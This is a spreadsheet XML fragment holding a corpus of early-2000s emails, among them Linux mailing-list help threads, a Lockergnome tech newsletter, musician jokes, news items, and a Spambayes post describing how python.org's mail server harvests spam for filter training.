 iD8DBQE9jy+1K9b4h5R0IUIRAjO9AJ0TO8a3237+K6/EJhI9eCv/E1K4OQCeIN4j
 nvTrcJ0dWiRGVWA9RZz7Kqk=
 =WTaV
 -----END PGP SIGNATURE-----
 --==_Exmh_2112058634P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Ralf wrote :
 &gt; Matthias Saou &lt;matthias@egwn.net&gt; wrote:
 &gt; &gt; My main concern is that when rebuilding the recent packages I've made
 &gt; &gt; for Psyche on Valhalla, I'd need to lower the "Release:" tag (to keep
 &gt; &gt; an upgrade working), and that would f*ck up my CVS repository which is
 &gt; &gt; on my Valhalla box
 &gt; 
 &gt; Sorry, I don't get it. What's wrong with a release tag of fr1?
 Say you have installed synaptic-0.24-fr1 on your Valhalla box (package
 rebuilt for Valhalla). Then you upgrade to Psyche using the Red Hat CDs.
 Hopefully with the compat libraries the package will still be there
 (although I doubt that since C++ is binary incompatible, so this is
 probably a bad example), then you "apt-get update" with the new Psyche
 repository... and there's where the problem will be : It will say that
 there are two synaptic-0.24-fr1 packages (one installed, the other
 available) with the same version but different dependencies :-/
 That's why I always keep package versions lower for older distributions.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</si>
  <si>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John P. Looney wrote:
 &gt;  OK, I guess that sysctl.conf is the best way of setting 
 &gt; 
 &gt;     /proc/sys/fs/file-max
 &gt; 
 &gt;  to a nice big number. Can you make a change to /etc/sysctl.conf, and then
 &gt; have it take effect, without a reboot (to test it, really) ?
 &gt; 
 &gt; John
 &gt; 
 &gt; 
 Have a look at the manual page for the sysctl command?
 Cheers,
 Waider.
 -- 
 waider@waider.ie / Yes, it /is/ very personal of me
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Lance wrote :
 &gt; Ok, I got ALSA installed and there is no static inbetween mp3s like
 &gt; before which is great!  My setup is digital 4.1 but sound is only coming
 &gt; from front 2 speakers and subwoofer, rear speakers there is no sound. 
 &gt; Also alsamixer or aumix are unresponsive as well. 
 Maybe you could find more info or tips on the ALSA page for your card?
 Also, you could try "alsactl store", editing /etc/asound.state" by hand
 (for me it contains data similar to what I can control with "alsamixer")
 then run "alsactl restore" and see if you're able to change what you want
 that way.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</si>
  <si>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Perhaps Apple isn't as user-friendly as we thought...
</t>
  </si>
  <si>
    <t xml:space="preserve">Sounds like the land of UNIX for the PC (Politically Correct) still has 
 some ways to go in becoming UNIX for the Rest of Us...
 Quoted from Mac OS X man page for sudoers(5):
 &gt;
 &gt;        insults     If set, sudo will insult users when they enter
 &gt;                    an incorrect password.  This flag is off by
 &gt;                    default.
 &gt;
 Hey, at least Apple set the default to no-insults! :-)
 Rohit
 ---
 My permanent email address is khare@alumni.caltech.edu
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/daily/20020715.html"&gt;
       http://www.lockergnome.com/issues/daily/20020715.html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&lt;/style&gt;&lt;title&gt;20020715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href="http://click.linksynergy.com/fs-bin/click?id=vdKWfulJxTQ&amp;offerid=36698.10000263&amp;type=4&amp;subid=0"&gt;&lt;IMG  width="468" height="60" alt="10354" border="0" src="http://www.winnetmag.com/linkshare/banners/10354.gif"&gt;&lt;/a&gt;&lt;IMG border="0" width="1" height="1" src="http://ad.linksynergy.com/fs-bin/show?id=vdKWfulJxTQ&amp;bids=36698.10000263&amp;type=4&amp;subid=0"&gt;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07.15.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;A HREF="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;&lt;img src="http://www.lockergnome.com/lgstore/sunshop/images/productpics/computerbasics.jpg" alt="TechTV's Computer Basics" height="109" width="63" border="2" hspace="10" align="left"&gt;&lt;/a&gt;
 &lt;b&gt;CHRIS TEACHES THE BASICS:&lt;/b&gt; If you've got friends or family who want to learn more about their PC, from a guy who makes things nice and easy, check out the VHS release of &lt;a href="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;Computer Basics&lt;/a&gt; in the GnomeStore. Chris teams with TechTV cohort, Kate Botello, to lead novices on a journey through their computer. From basic interactions, to installing apps, to using the Internet and e-mail, Chris and Kate have all the basics covered. Help out a friend and  &lt;a href="http://www.lockergnome.com/lgstore/sunshop/index.php?action=item&amp;id=68"&gt;get them a copy&lt;/a&gt; today.    
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 It's official: Gretchen, Sprocket, and I will be moving in a few
 weeks. Not too far, though. We'll be going deeper into the city of
 San Francisco starting on the first of September. Lori and Norm
 were here over the weekend (for a photo shoot); in between sets,
 Gretchen invited them to join her hunt. They came upon a house
 located in one of the busier parts of town. With only street
 parking available, I wasn't too thrilled about investigating the
 property. However, my wife seemed optimistic. We kinda knew what
 we were looking for in a residence (and its neighborhood), but
 also knew we'd have to make certain concessions in the process. We
 parked (literally) up the hill and found our way to what would
 turn out to be our future home (at least, for the next year or
 so). It has lots of usable space - which is a premium here. Plus,
 the landlords are extremely dog-friendly. Winner! The pictures and
 videos will come, never fear.
 &lt;p&gt;
 &lt;table align="left"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size="1"&gt;&lt;B&gt;PC World Picks&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,4172,00.asp"&gt;WinZip v8.1&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,5648,00.asp"&gt;IrfanView v3.70&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,2049,00.asp"&gt;ACDSee v4.0.2&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,3335,00.asp"&gt;Microangelo v5.5&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,2015,00.asp"&gt;SmartDraw&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,5556,00.asp"&gt;Winamp v2.80&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,2432,00.asp"&gt;Paint Shop Pro&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,2920,00.asp"&gt;Cool Edit 2000&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,7996,00.asp"&gt;UltraEdit v9.00a&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,6570,00.asp"&gt;Backup Plus v6.1.1&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,2051,00.asp"&gt;TextPad v4.5&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,20521,00.asp"&gt;Mailbag Asst v2.6c&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,4780,00.asp"&gt;Time and Chaos v5.4.0&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,15740,00.asp"&gt;SureThing Labeler&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,7573,00.asp"&gt;WinRAR v3.00&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.pcworld.com/downloads/file_description/0,fid,7777,00.asp"&gt;Blaze Media Pro&lt;/A&gt;&lt;BR&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 First order of business: get broadband! According to AT&amp;T's Web
 site, cable modem service is not available in the area. However,
 DSL is an option. So, it looks like I'm going to be purchasing an
 external &lt;A HREF="http://lockergnome.pricegrabber.com/search_gen.php?form_keyword=dsl%20modem"&gt;DSL
 modem&lt;/A&gt; in a few days. Any suggestions?
 Yeah, I'm not even sure who I'll select for my provider. They
 currently use SBC to get online, so I might just stick with them
 for continuity's sake. Verizon has been solid enough for me here,
 but I believe our loft complex has a unique infrastructure. If I
 could make contact with someone from any capable system, I'd
 probably go with them. I should probably get the ball rolling
 soon, though - I'd hate to play the waiting game for too long.
 I've heard of installation nightmares, so I'll probably be rolling
 my own (again). 56k is quaint, but hardly enough pipe to get any
 real work done. When you download as much as I do, every bit
 counts. Oh, and did I tell you about the bites?
 &lt;p&gt;
 There are plenty of unique restaurants in just about every
 direction. Plus, we're right up around the corner from a Peet's
 outlet! If you need me, you know where you can find me. I'll
 probably also be setting up a Wi-Fi network before too long, too.
 My Proxim hardware still works, but I wasn't sure if I needed a
 crossover cable to connect it to my router. Furo tells me: "If the
 hub has an uplink port, then a straight cable should work between
 the two, as it provides the crossover for you. If both have uplink
 and non-uplink ports (workstation attachment ports), then you
 would need a crossover cable between like ports. For instance, if
 you were connecting a workstation port on one to a workstation
 port on another, you'd have to use a crossover. Same for uplink to
 uplink." How's that for home network helpfulness? Oh, if only he'd
 do a free &lt;a href="http://www.gnometomes.com/"&gt;Gnometome&lt;/a&gt; for
 us...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&lt;b&gt;Traces Viewer v1.0 [478k] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://www.surfpilot.net/tracesviewer.html"&gt;http://www.surfpilot.net/tracesviewer.html&lt;/a&gt;
 &lt;p&gt;
 {Find Web site remnants} Who knows what evils lurk on the hard
 drives of mine? I'm always curious about what has been downloaded
 to my PC after I have visited a website. I suppose I COULD clear
 out my Temporary Internet Files before going to every single
 page... or I could just install Traces Viewer. This handy
 application gives me the power to see what my PC acquires for
 every website I visit. With Traces Viewer's easy-to-read
 interface, I can see what files come from each site, and also if
 the site contained any cookies.  Mmmmmm, cookies... now, how could
 chocolate chip be evil?
 &lt;p&gt;&lt;br&gt;
 &lt;b&gt;Pixel Toolbox v1.1 [3.7M] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://www.axiomx.com/PixelToolbox/"&gt;http://www.axiomx.com/PixelToolbox/&lt;/a&gt;
 &lt;p&gt;
 {Make your own icons} I have a compulsive habit of changing the
 original desktop and icons in Windows to a version that mirrors my
 personality. So what happens if I can't find a desktop or set of
 icons that suits me? I load up Pixel Toolbox! This program allows
 me to flex my creative skills by creating Windows icons and
 pointers. Find yourself in a creativity slump? Well, you don't
 have to strain your creative muscle. PixelToolbox allows you to
 import an image that you already own, and work from there. If that
 isn't enough, you can fashion your own tiled desktop or share your
 creation with friends by exporting your masterpiece as a .jpg,
 .png, .tga, or .tif file.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&lt;b&gt;Software Audit Protection Program [2.9M] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://www.alliedhr.com/sapp.htm"&gt;http://www.alliedhr.com/sapp.htm&lt;/a&gt;
 &lt;p&gt;
 You NEVER pirate software, right? OF COURSE YOU DON'T! (Good
 answer.) So, if someone came to your door and accused you of
 software piracy, could you prove them wrong? With the Software
 Audit Protection Program (SAPP), you could. You can track every
 piece of software you own with this application; you can attach an
 image of your paper receipt, add information like serial numbers
 and activation keys, etc., so you will never be left hunting for
 these items in the future. SAPP can even create and print reports
 detailing your inventory. If you own a small company and want to
 make confirm that you and your employees are "Software Compliant,"
 this is the program for you. You can track your software using
 many different variables such as License, User ID, Software Title
 or Activation Key. Don't get caught second-guessing... be certain
 with the Software Audit Protection Program!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&lt;b&gt;Print! v1.6 [319k] W9x/2k/XP US$39&lt;/b&gt;&lt;br&gt;
     Unearthed by Rob Muller
 &lt;p&gt;
 &lt;a class="URL" href="http://www.robsoftware.com/"&gt;http://www.robsoftware.com/&lt;/a&gt;
 &lt;p&gt;
 {Screen print utility} Time is money, and I endorse any program
 that can save me time. Luckily, that is exactly what Print! v1.6
 does. Say that I want to share screenshots with my other tech
 friends to compare error messages and talk about possible fixes:
 every time I take a screen shot, I open up Word, paste the
 snapshot, and THEN I can print it. Too many steps, too much of my
 time! With Print!, I just hit my "Print Screen" key and out comes
 my screenshot without involving any other programs. Don't want a
 screenshot of your whole desktop? Not a problem, just press Alt +
 Print Screen and you'll have a printout of the active window only.
 Print! 1.6 goes so far as to put the date and time on your
 printout too... perfect for saving those high scores on solitaire!
 Other features include scaling, centering, and the ability to
 invert images. (So, not only will you save time, you'll also save
 on toner. Bonus!)  You may also want to note that Print! saves
 your printer configuration without wreaking havoc on the settings
 in your other programs. You'll definitely get your money's worth
 with this program. Don't believe me? Start by checking out the
 evaluation version for yourself!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border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;REMOTE ACCESS TO YOUR E-MAIL&lt;/b&gt;: LoudPC is a new product from Loudfire enabling direct access to your PC's Outlook(tm) from any Internet browser or web phone. Use LoudPC to access your work email from home, check your next appointment while at lunch, reply to an important email while in a meeting, etc. No synchronization required. Works with your existing email accounts. Accesses all of your folders. All changes reflected immediately in your Outlook(tm). &lt;a href="http://www.qksrv.net/click-471546-7064313"&gt;Get more info on LoudPC&lt;/a&gt; &lt;img src="http://www.qksrv.net/image-471546-7064313" width="1" height="1" border="0"&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;b&gt;BookCrossing Bookclub&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://bookcrossing.com/"&gt;http://bookcrossing.com/&lt;/a&gt;
 &lt;p&gt;
 Gretchen is a self-professed pack rat: there are just some things
 that she can't throw away. For example, books. I, on the other
 hand, prefer my text in an electronic medium, and don't really
 miss those analog versions. (What's that stuff called again?
 Paper?) Many of my books are gathering dust on the bookshelf. The
 alternative? Free them into the wild! BookCrossing is essentially
 a worldwide book club. You register online and get a BookCrossing
 ID number to put on your books with a note sending the new reader
 back to BookCrossing (think of wheresgeorge.com). Then you just
 leave the book "in the wild" to be found by someone else; the
 folks at BookCrossing suggest a park bench, the pocket of an
 airplane seat, or just plain giving your book to a friend. "Sounds
 easy, right? Well it is. It's also a fascinating exercise in fate,
 karma, or whatever you want to call the chain of events that can
 occur between two or more lives and one piece of literature. Oh,
 and we should mention, it's absolutely free and absolutely
 private, too." BookCrossing also offers book reviews, ratings, and
 recommendations.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Any modem that relies on Windows to function is dubbed a
 "Winmodem." Most manufacturers use "Winmodems" because they are
 cheap and easy to set up on a standard model PC. I don't have any
 problem with the manufacturer saving money (because living in a
 capitalistic society, I would hope that the savings would trickle
 down to ME in one way or another). I do, however, have a problem
 with the way "Winmodems" function after you add more internal
 devices to your PC. "Winmodems" rely on Windows to mediate their
 serial communication (I/O address, COM port, IRQ, etc.) and as you
 can imagine, the more devices Windows has to manage, the higher
 the probability of running into a problem. And what if you want to
 run Linux instead? Will the "Winmodem" function well, if at all,
 in an operating system other than Windows? Don't bet on it! If you
 want to make sure you don't have any problems after upgrading your
 system, you'll want to get yourself a hardware modem. How can you
 determine this? Checking a modem's system requirements. If the
 modem says it REQUIRES Windows, then keep looking... you've found
 yourself a "Winmodem." However, if the system requirements for the
 modem say that it will work with Linux, then you've found yourself
 a hardware modem. Yes, it IS that easy.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href="http://www.lockergnome.com/issues/daily/20020715.html"&gt;http://www.lockergnome.com/issues/daily/20020715.html&lt;/a&gt;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Deeper Uplink --&gt;
 Toys are made in heaven, batteries are made in hell.
 &lt;/font&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">There are so many good musician jokes.
 A couple of my favorites:
 Q. What's the difference between a viola and a violin?
 A. A viola burns longer.
 Q. What's the definition of a minor second?
 A. Two oboes playing in unison.
 - Joe
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Bloodhag interviewed
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85513616
 Date: Not supplied
 The new ish of Strange Horizons in out, with an interview with Bloodhag, the 
 most metal of the all the science fiction metal bands. 
     Soon, the spotlight comes up again. The lead singer grabs the microphone. 
     "This is Frank Bellknap Long!" he yells, and, feverish, launches into a 
     lecture on Long's oeuvre. There can't be more than a handful of people on 
     this earth who could get a beer-sodden thrash crowd to listen to an English 
     Lit lecture. Thirty seconds later, the audience is sufficiently educated, 
     and the guys begin to wail. Jake the singer holds the microphone over his 
     head and belts out the song in a growling voice that's monster-movie low. 
     "No reason! No corners!" he shouts. Two minutes later, they're done with 
     the pulps and ready to move on to the New Wave. "Our next song is about 
     Harlan Ellison!" Jake bellows, and the geeks, the hipsters, the metalheads, 
     and the drunks let out a howl of mutual joy. 
     Bldhag -- note the dual umlauts -- hails from Seattle. Describing 
     themselves as "edu-core," the band performs nothing but two-minute thrash 
     tributes to science fiction writers. Between songs, the band pelts the 
     audience with paperback books, quizzes them on book titles, and demands 
     that the audience show their library cards. Their motto: "The Faster You Go 
     Deaf, the More Time You Have to Read."  
 Link[1] Discuss[2] (_Thanks, Zed[3]!_)
 [1] http://www.strangehorizons.com/2002/20020930/bloodhag.shtml
 [2] http://www.quicktopic.com/boing/H/kfFeZdnp8NE
 [3] http://www.mememachinego.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Spambayes] python.org email harvesting ready to roll
</t>
  </si>
  <si>
    <t xml:space="preserve">[followups to spambayes@python.org please, unless you're specifically
  concerned about some particular bit of email policy for python.org]
 OK, after much fiddling with and tweaking of /etc/exim/exim4.conf and
 /etc/exim/local_scan.py on mail.python.org, I am fairly confident that
 I can start harvesting all incoming email at a moment's notice.  For the
 record, here's how it all works:
   * exim4.conf works almost exactly the same as before if the file
     /etc/exim/harvest does not exist.  That is, any "junk mail
     condition" that can be detected by Exim ACLs (access control lists)
     is handled entirely in exim4.conf: the message is rejected before it
     ever gets to local_scan.py.  This covers such diverse cases as
     "message from known spammer" (reject after every RCPT TO command),
     "no message-id header", and "8-bit chars in subject" (both rejected
     after the message headers/body are read).
     The main things I have changed in the absence of /etc/exim/harvest
     are:
       - don't check for 8-bit chars in "From" header -- the vast
         majority of hits for this test were bounces from some
         Asian ISP; the remaining hits should be handled by SpamAssassin
       - do header sender verification (ie. ensure that there's a
         verifiable email address in at least one of "From", "Reply-to",
         and "Sender") as late as possible, because it requires DNS
         lookups which can be slow (and can also make messages that
         should have been rejected merely be deferred, if those DNS
         lookups timeout)
   * if /etc/exim/harvest exists, then the behaviour of all of those
     ACLs in exim4.conf suddenly changes: instead of rejecting recipients
     or messages, they add an X-reject header to the message.  This
     header is purely for internal use; it records the name of the folder
     to which the rejected message should be saved, and also gives the
     SMTP error message which should ultimately be used to reject
     the message.
     Thus, those messages will now be seen by local_scan.py, which now
     looks for the X-reject header.  If found, it uses the folder name
     specified there to save the message, and then rejects it with the
     SMTP error message also given in X-reject.  (Currently X-reject is
     retained in saved messages.)
     If a message was not tagged with X-reject, then local_scan.py
     runs the usual virus and spam checks.  (Namely, my homebrew
     scan for attachments with filenames that look like Windows
     executables, and a run through SpamAssassin.)  The logic is
     basically this:
       if virus:
           folder = "virus"
       else:
           run through SpamAssassin
           if score &gt;= 10.0:
               folder = "rejected-spam"
           elif score &gt;= 5.0:
               folder = "caught-spam"
     Finally, local_scan.py writes the message to the designated folder.
     By far the biggest folder will be "accepted" -- the server handles
     2000-5000 incoming messages per day, of which maybe 100-500 are junk
     mail.  (Oops, just realized I haven't written the code that actually
     saves the message -- d'ohh!  Also haven't written anything to
     discriminate personal email, which I must do.  Sigh.)
   * finally, the big catch: waiting until after you've read the message
     headers and body to actually reject the message is problematic,
     because certain broken MTAs (including those used by some spammers)
     don't consider a 5xx after DATA as a permanent error, but keep
     retrying.  D'ohh.  This is a minor annoyance currently, where a fair
     amount of stuff is rejected at RCPT TO time.  But in harvest mode,
     *everything* (with the exception of people probing for open relays)
     will be rejected at DATA time.  So I have cooked up something called
     the ASBL, or automated sender blacklist.  This is just a Berkeley DB
     file that maps (sender_ip, sender_address) to an expiry time.  When
     local_scan() rejects a message from (sender_ip, sender_address) --
     for whatever reason, including finding an X-reject header added by
     an ACL in exim4.conf -- it adds a record to the ASBL, with an expiry
     time 3 hours in the future.  Meanwhile, there's an ACL in exim4.conf
     that checks for records in the ASBL; if there's a record for the
     current (sender_ip, sender_address) that hasn't expired yet, we
     reject all recipients without ever looking at the message headers or
     body.
     The downside of this from the point-of-view of corpus collection is
     that if some jerk is busily spamming *@python.org, one SMTP
     connection per address, we will most likely only get one copy.  This
     is a win if you're just thinking about reducing server load and
     bandwidth, but I'm not sure if it's helpful for training spam
     detectors.  Tim?
 Happy harvesting --
         Greg
 -- 
 Greg Ward &lt;gward@python.net&gt;                         http://www.gerg.ca/
 Budget's in the red?  Let's tax religion!
     -- Dead Kennedys
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your Membership Exchange, Issue #422
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Pitch Dark Bar Opens for Blind Dates
</t>
  </si>
  <si>
    <t xml:space="preserve">This is preaty neat.
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
 Pitch Dark Bar Opens for Blind Dates
 Thu Sep 5,10:09 AM ET
 BERLIN (Reuters) - Diners at Berlin's newest restaurant cannot see what they
 are eating and have to be guided to their table by blind waiters because the
 bar is pitch black.
 The restaurant, which opened Wednesday, aims to make guests concentrate on
 senses other than sight.
 Holding on to one another, the first visitors followed waiter Roland
 Zimmermann, 33, into the dining room. Although the PhD student has been
 blind since childhood, he is the only one able to point out chairs, cutlery
 and drinks.
 "I'm putting your plate right in front of you," Zimmermann said. "I can't
 find my mouth," one voice replied out of the dark. "I wonder what this dish
 is -- Lasagne? Or some casserole?" another invisible guest said.
 In the "unsicht-Bar," which means invisible in German, diners cannot choose
 complete dishes from the menu but can only indicate whether they would like
 a fish, meat or vegetarian option.
 "We want people to have an extraordinary experience of tasting, feeling and
 smelling," said Manfred Scharbach, head of the organization for blind and
 sight-restricted people, which is running the bar.
 "People are surprised that their tongues and taste senses are taking over
 and are sending signals, which their eyes would normally have sent," he
 added.
 Of the 30 staff, 22 are blind.
 An average meal lasts about three hours and the waiters are always around to
 help, Scharnbach said.
 And at the end of the night, they will even reveal what customers have
 actually been eating.
</t>
  </si>
  <si>
    <t xml:space="preserve">I want to thank those involved in making these RPMS available.  Thanks
 guys, thanks Matthias.
 Lance
 On Thu, 2002-08-29 at 14:30, Lance wrote:
 &gt; Thanks Matthias.  Actually I got all four speakers with subwoofer
 &gt; working in digital out mode with gamixer.
 &gt; (http://www1.tcnet.ne.jp/fmurata/linux/down/)
 &gt; 
 &gt; However switching between analog and digital, I'm still baffled.  As I
 &gt; have a tuner and cassette deck hooked up to "Line In" on a SBLive! 5.1,
 &gt; which is in analog mode.  But digital out works great now!
 &gt; 
 &gt; On Wed, 2002-08-28 at 23:26, Matthias Saou wrote:
 &gt; &gt; Once upon a time, Lance wrote :
 &gt; &gt; 
 &gt; &gt; &gt; Ok, I got ALSA installed and there is no static inbetween mp3s like
 &gt; &gt; &gt; before which is great!  My setup is digital 4.1 but sound is only coming
 &gt; &gt; &gt; from front 2 speakers and subwoofer, rear speakers there is no sound. 
 &gt; &gt; &gt; Also alsamixer or aumix are unresponsive as well. 
 &gt; &gt; 
 &gt; &gt; Maybe you could find more info or tips on the ALSA page for your card?
 &gt; &gt; Also, you could try "alsactl store", editing /etc/asound.state" by hand
 &gt; &gt; (for me it contains data similar to what I can control with "alsamixer")
 &gt; &gt; then run "alsactl restore" and see if you're able to change what you want
 &gt; &gt; that way.
 &gt; &gt; 
 &gt; &gt; Matthias
 &gt; &gt; 
 &gt; &gt; -- 
 &gt; &gt; Matthias Saou                                World Trade Center
 &gt; &gt; -------------                                Edificio Norte 4 Planta
 &gt; &gt; System and Network Engineer                  08039 Barcelona, Spain
 &gt; &gt; Electronic Group Interactive                 Phone : +34 936 00 23 23
 &gt; &gt; 
 &gt; &gt; _______________________________________________
 &gt; &gt; RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt; &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
 &gt; -- 
 &gt; :
 &gt; ####[ Linux One Stanza Tip (LOST) ]###########################
 &gt; 
 &gt; Sub : Finding out files larger than given size       LOST #324
 &gt; 
 &gt; To find out all files in a dir over a given size, try:
 &gt; find /path/to/dir_of_file -type f -size +Nk
 &gt; [Where N is a number like 1024 for 1mb, and multiples thereof] 
 &gt; 
 &gt; ####[Discussions on LIH : 04 Jul 2002]########################
 &gt; :
 &gt; 
 &gt; 
 &gt; _______________________________________________
 &gt; RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
 -- 
 :
 ####[ Linux One Stanza Tip (LOST) ]###########################
 Sub : Finding out files larger than given size       LOST #324
 To find out all files in a dir over a given size, try:
 find /path/to/dir_of_file -type f -size +Nk
 [Where N is a number like 1024 for 1mb, and multiples thereof] 
 ####[Discussions on LIH : 04 Jul 2002]########################
 :
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 Status: RO
 Date: Sat, 24 Aug 2002 11:39:34 -0400
 To: "R. A. Hettinga" &lt;rah@shipwright.com&gt;
 From: Somebody
 Subject: Re: "Ouch. Ouch. Ouch. Ouch. Ouch...."(was Re: My brain hurts)
 And then there was the one from Prairie Home Companion:
 Q. Why is a viola larger than a violin?
 A. It  just looks that way because a violin player's head is bigger.
 &gt;--- begin forwarded text
 &gt;
 &gt;
 &gt;Status: RO
 &gt;Delivered-To: fork@example.com
 &gt;From: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;
 &gt;Organization: Rose Garden Funeral of Sores
 &gt;User-Agent: Mutt/1.5.0 [-1214711651]
 &gt;To: Flatware or Road Kill? &lt;FoRK@xent.com&gt;
 &gt;Subject: Re: "Ouch. Ouch. Ouch. Ouch. Ouch...."(was Re: My brain hurts)
 &gt;Sender: fork-admin@xent.com
 &gt;Date: Wed, 24 Jul 2002 15:17:40 -0700
 &gt;
 &gt;There are so many good musician jokes.
 &gt;
 &gt;A couple of my favorites:
 &gt;
 &gt;Q. What's the difference between a viola and a violin?
 &gt;A. A viola burns longer.
 &gt;
 &gt;Q. What's the definition of a minor second?
 &gt;A. Two oboes playing in unison.
 &gt;
 &gt;- Joe
 &gt;
 &gt;
 &gt;http://xent.com/mailman/listinfo/fork
 &gt;
 &gt;--- end forwarded text
 &gt;
 &gt;
 &gt;--
 &gt;-----------------
 &gt;R. A. Hettinga &lt;mailto: rah@ibuc.com&gt;
 &gt;The Internet Bearer Underwriting Corporation &lt;http://www.ibuc.com/&gt;
 &gt;44 Farquhar Street, Boston, MA 02131 USA
 &gt;"... however it may deserve respect for its usefulness and antiquity,
 &gt;[predicting the end of the world] has not been found agreeable to
 &gt;experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
 -- 
 --- end forwarded text
 -- 
 R. A. Hettinga &lt;mailto: rah@ibuc.com&gt;
 The Internet Bearer Underwriting Corporation &lt;http://www.ibuc.com/&gt;
 44 Farquhar Street, Boston, MA 02131 USA
 "Never underestimate the power of stupid people in large groups."
 --George Carlin
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Reg Headlines Wednesday July 17
</t>
  </si>
  <si>
    <t xml:space="preserve">Today's Headlines from The Register
 -----------------------------------
     To unsubscribe from this daily news update, see the instructions at
     the end of this message.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Software
     Ballmer 'fesses up to Linux/Windows cost FUD
     Just can't keep that myth alive
         http://www.theregister.co.uk/content/4/26230.html
     Microsoft backs Web services security standard
     Security Assertion Markup Language
         http://www.theregister.co.uk/content/4/26211.html
     Liberty Alliance unveils secure sign-on specs
     Authentic
         http://www.theregister.co.uk/content/4/26210.html
     Peru mulls Free Software, Gates gives $550k to Peru Prez
     Funny old life...
         http://www.theregister.co.uk/content/4/26207.html
     Unisys takes high and middle roads with new ES7000s
     Twin product streams
         http://www.theregister.co.uk/content/4/26205.html
     Microsoft lifts veil on Corona media platform
     Ooh, you tease
         http://www.theregister.co.uk/content/4/26204.html
     MS to ship Media Center 'special edition' of XP in Q4
     It's that remote control unit called Freestyle really...
         http://www.theregister.co.uk/content/4/26201.html
 Enterprise Systems
     Soft landing for firms caught in Web host fallout?
     Silver lining
         http://www.theregister.co.uk/content/53/26220.html
     IBM sends Shark into feeding frenzy
     Storage price wars
